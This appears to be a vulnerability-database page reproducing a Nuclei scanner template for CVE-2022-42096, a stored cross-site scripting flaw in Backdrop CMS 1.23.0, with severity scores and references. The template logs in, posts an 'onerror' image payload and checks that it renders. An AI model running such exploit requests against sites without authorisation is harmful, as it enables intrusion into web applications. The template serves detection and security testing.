Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-42096HistoryMay 06, 2023 - 12:12 p.m.
Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
2023-05-0612:12:20
ProjectDiscovery
github.com
5
backdrop cms
cve2022
cross site scripting
medium severity
authenticated
user input
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
0.008 Low
EPSS
Percentile
81.3%
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
id: CVE-2022-42096
info:
name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
remediation: |
Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42096
- https://nvd.nist.gov/vuln/detail/CVE-2022-42096
- https://backdropcms.org
- https://github.com/manas3c/CVE-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42096
cwe-id: CWE-79
epss-score: 0.0068
epss-percentile: 0.79938
cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: backdropcms
product: backdrop_cms
tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/post HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="title"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_tags[und]"
{{randstr}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][summary]"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][value]"
<img src=x onerror=alert(document.domain)>
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="body[und][0][format]"
full_html
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][fid]"
0
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="field_image[und][0][display]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="changed"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_build_id"
{{form_id_1}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_token"
{{form_token}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="form_id"
{{form_id_2}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[date]"
2023-04-25
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="scheduled[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="promote"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="name"
{{name}}
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[date]"
2023-04-24
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="date[time]"
16:59:23
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="path[auto]"
1
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="comment"
2
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="additional_settings__active_tab"
------WebKitFormBoundaryIubltUxssi0yqDjp
Content-Disposition: form-data; name="op"
Save
------WebKitFormBoundaryIubltUxssi0yqDjp--
- |
GET /?q=posts/{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- <img src="x" onerror="alert(document.domain)" />
- Backdrop CMS
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- name="form_build_id" value="(.*)"
internal: true
- type: regex
name: name
group: 1
regex:
- name="name" value="(.*?)"
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- name="form_id" value="(.*)"
internal: true
- type: regex
name: form_token
group: 1
regex:
- name="form_token" value="(.*)"
internal: true
# digest: 4b0a00483046022100c7cd418af97444eb54e6d2a1d5baa6163d10a42822a43a16dd45a3c3128484e9022100d9ff9dbf306d6c38bf75de7c7aa3bb289d403b5506c3617d761d657a7289651d:922c64590222798bb761d5b6d8e72950Related
cve
cve
CVE-2022-42096
2022-11-21 21:15:11
veracode
veracode
Cross-site Scripting (XSS)
2023-02-10 06:33:44
osv
osv
CVE-2022-42096
2022-11-21 21:15:11
Cross-site Scripting in Backdrop CMS
2022-11-21 21:30:14
prion
prion
Cross site scripting
2022-11-21 21:15:00
github
github
Cross-site Scripting in Backdrop CMS
2022-11-21 21:30:14
nvd
nvd
CVE-2022-42096
2022-11-21 21:15:11
cvelist
cvelist
CVE-2022-42096
2022-11-21 00:00:00
4.8 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
0.008 Low
EPSS
Percentile
81.3%
Related for NUCLEI:CVE-2022-42096